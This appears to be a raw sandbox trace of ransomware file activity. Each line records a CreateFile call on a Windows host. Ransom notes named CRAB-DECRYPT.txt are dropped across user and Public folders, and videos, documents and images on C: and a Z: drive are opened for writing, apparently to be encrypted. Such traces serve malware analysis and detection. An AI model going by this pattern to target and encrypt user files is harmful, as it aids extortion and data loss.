Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\0iq_\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\0iq_\1oCEz.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\0iq_\wq0VTY0S19vaT4.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\6N8045c-SOWtMc.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\8aPatwAh6P3H4-.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\42d71SFHtTn0.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\CdaMBp8nKQu.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\fV4Fc3O\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\fV4Fc3O\gmHZ.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\fV4Fc3O\YkYfpbbQRLzkj-iDSU.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\mMxRmF1CC.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\noh4ZMY.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\QLZ1qryy.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3WBZ.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\HK2dS 8.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\N EkZNbc1o3WN.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\cRZ0MtepZOGtVnmrc.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\uYKBTfxUAvyzIn-4.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\vRoQOnjztauZ.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\EiMPnwUb_7vMWhYd7wv.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\MVjr4a.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\R0rwP4.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\WIq3ApVMmH.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\Y59DUvi4K\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\Y59DUvi4K\0LjUzOYL0mzm_UXICi_Z.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\Nu17HJT.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\Y59DUvi4K\Mzuva081Ecml_PBXx.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\x9hlPaP1ozUu.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\M7iYqPEbNDAkD6K.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\PVcWLp.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\Pz0WplIg7eOK1qIe0.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\u4ggu.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\Xu9u_e.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Public\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Public\AccountPictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Public\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Users\Public\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Public\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Public\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Public\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Public\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Public\Libraries\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\DTxMcdBSiMydDh.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Public\Libraries\RecordedTV.library-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Public\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Users\Public\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Users\Public\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create Z:\PD2J8WWYx87xI0ZI.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\T8EpXefSMHECv.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Pwx0NeK5H26N3X7a.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\N56ssz.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\FwXHW.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\BQFGGXzv3.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Dj56CGtKFxmm4j0.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\uxr0VgIKyabrfeDqhyX.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\LfWkkMwiKa4.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\IT6h99wlQ8kMSRWY.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ZURHdOemF1Sio2JJg0.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\DLkdqSFl1CQPIWIFI.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\0l49yVa27V3fbp0.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\QoeoAcaeeahNH1u.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\bmZb8.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ePjafyFSVAy.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\n1oIgSCOHCUfCFKnMot5.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\mW4UoHVdQjsL.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\o31FKcUml.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Kh4ML0UlDG8G3xTW7.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\QahKCn8ueyqJ7tcTfc.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\V2B1F8D.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\4yXte0uXIFucLv4.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ashgeHC2PQdqLQk7.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ZvphsNc.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Lp3sHpFPOeag.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\HCn2qrul7ygqoS.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\1fn93wGZjdanZB.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\dp9u7AdNvM4gE.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\FSEmJ5n1uMSloscL.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\qCc7INt1lZdUfK.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\MR8b0p2eb.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\6FHTeIALuazFh6S.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Jo92bs8aTj1Vj0c.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\pnOgbKINM1qNAlrGulmO.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\tbDCg9D.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Sly3qKgO3ATm8o.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\spHYAF9ViIqM9vtOW.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\d8qsFgy6NUR5eQtZvA.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\EONMy4FO98J1ipDWLzTP.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\vDGdxB.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ibePv6Lj2e91qk.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\9nXLd1stH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\rmkutDE080.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Zco6FDtNcxUboIRnw.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\rp59XRK0hPQE.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\HPloVL0oZ.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\nucEj.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\NjZEnmit.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\rYQhITml8s4Mffbv10w.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\rKWXelaLEZJ.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\zvb7Mnw3iSwviEopdWc.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\aHSgQEUnQ.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\EJbZxMj.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\AXHKm6GyRoXWvxAR1nK.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\aQV013X.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\IWEBAEoUidzls4DEURs.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\3f8x8CrYapPiNap.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\QkLjJ0I.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\z8zLOOgA3oe.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\gtMj5dvrEffpxCN.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Uxo8b6v.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\z6JgWitYLK.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ivgKlBjI9.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ZRjAo5mazeN.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\86j9DrKplH4.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\DHPDPLo.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\A8bmjbQ.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\JIofEOBdEma0DMUbK.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\9oWgPalpl4eZPpCd.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ApDFPQwO402DkMuco.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\vLMfJAjyPseo6Kmg.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Dt6fR5uK1o7A3G9Az9xZ.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Qz05DmCXS7.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\u3j1lsXp4o0dJ.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\UHagWXyAwvvYR6B2f.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\P9p5SRi7OL0lv.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\pzNmYBUWbUH.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\qI3Ls7msTJ7Z5.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\gBya9RjXQ5HVsyeT1gt.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\l7JxDWOVk.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\VZ60ie.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\xgvcXmhtLB.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\9N07GKsKkqcxa3TT.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\OxsstRqW1jSBVg9mfGKW.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\SNRKtKQZn5jdD5Qp.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\AyUhCaK.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\7eOistArUshTqU.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\ceEw3OhIGAO0766qFm0B.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\dWi8QA6EVif9AdQ964.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\wtAmsr1H.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\af21bQ5qW.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\8tUbiYEgTdW.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\JVOUo4viHF8su3w5.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\InBvUlw.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\JijZUlwsABe0xQXl.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\pGRiU.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\b32L7cLeqU2oCZ.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\UmBm0ITsbHYon7XWq4F.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\JoVvFlGh27b31AC0CwDF.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
